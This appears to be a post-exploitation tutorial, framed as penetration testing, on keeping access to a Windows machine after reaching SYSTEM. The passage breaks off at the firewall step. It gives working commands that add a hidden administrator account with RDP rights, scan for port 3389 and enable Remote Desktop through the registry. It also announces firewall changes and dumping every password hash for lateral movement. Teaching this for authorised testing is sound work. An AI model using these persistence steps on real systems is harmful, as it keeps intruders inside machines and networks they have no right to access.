So congrats you got NT AUTHORITY\SYSTEM on a Windows computer, however, this begs the question; Now what? Today I want to walk you through some important steps to take after escalating privileges in windows. We are going to start by adding a user and adding them into the appropriate groups to have continued access to this system. We will then enable RDP if it is not already, configure the firewall to allow us to persist, and finally dump the password hashes for all users to have backup access in addition to potential lateral movement capabilities if this is a domain.
Let's get that user added.
The following commands will create a user, add them to the administrator's group, as well as the “Remote Desktop Users” group. This will allow us to have admin rights to the system as well as RDP in which can be huge for post-exploitation and artifact gathering.
Add a user named Ice with the password Hacking
net user Ice Hacking /addAdd the user Ice into the administrator's group
net localgroup administrators Ice /addAdd the user Ice into the “Remote Desktop Users” group
net localgroup "Remote Desktop Users" Ice /addEnable RDP
Now that we have our user added to the system we can move on to enabling RDP if it is not already. Whether RDP is open or not should have been discovered in the Recon and Enumeration stage of your penetration test, however, if you want to double-check before attempting to remote in you can use the command below.
sudo nmap -sS {ip address} -p 3389Note: While 3389 is the default port for RDP a System Administrator could have it mapped to another port. This goes back to information we should find during our initial Recon of the target.
If RDP is not activated we can enable it with this registry editor command from the cmd.exe prompt:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fTo allow RDP through the Windows Firewall you can enter this command from the cmd.exe prompt:
